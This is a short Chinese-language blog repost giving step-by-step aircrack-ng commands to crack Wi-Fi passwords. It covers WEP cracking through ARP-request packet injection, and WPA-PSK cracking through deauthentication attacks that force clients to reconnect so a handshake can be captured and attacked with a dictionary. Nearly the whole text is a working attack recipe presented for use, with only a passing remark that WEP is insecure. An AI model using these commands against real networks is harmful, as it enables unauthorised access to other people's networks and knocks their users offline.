内容转自:http://blog.csdn.net/fengshenyue/article/details/49896579
具体附图参考:http://netsecurity.51cto.com/art/201105/264844_all.htm
一、破解WEP:
由于WEP破解基于有效数据报文的积累,当收集到足够数量的ivs数据报文后就可以进行破解,对目标ap使用arprequest注入攻击。
1)ifconfig wlan0 up
激活无线网卡。
2)airmon-ng start wlan0(无线网卡)
将无线网卡设置为混杂模式。
3)airodump-ng -w 文件名 -c 频道 mon0(处于混杂模式下的无线网卡)
对特定频道下的无线网络进行监听,扫描数据保存到特定文件
4)aireplay-ng -3 -b AP的mac地址 -h 客户端的mac地址 mon0(处于混杂模式下的无线网卡)
-3代表arprequest注入攻击,当注入后收集到的数据越多,破解速度越快,请注意WEP加密的wifi密码一定能够破解,所以WEP加密的wifi密码极不安全。
5)aircrack-ng 捕获的cap文件或ivs文件
使用aircrack-ng工具破解得到密码。
二、破解WAP:
WPA-PSK的破解基于WPA-PSK握手验证报文数据的获取与识别,攻击者只要获取到尽可能的握手验证报文数据包就有机会破解。
1)ifconfig wlan0 up #激活无线网卡。
2)airmon-ng start wlan0(无线网卡)
将无线网卡设置为混杂模式。
3)airodump-ng -w 文件名 -c 频道 mon0(处于混杂模式下的无线网卡)
对特定频道下的无线网络进行监听,扫描数据保存到特定文件
4)aireplay-ng -0 10 -a AP的mac地址 -c 客户端的mac地址 mon0(处于混杂模式下的无线网卡)
-0代表deauth重传攻击方式,使客户端断开重连以便有机会得到握手验证数据报文
5)aircrack-ng -w 字典 捕获的cap文件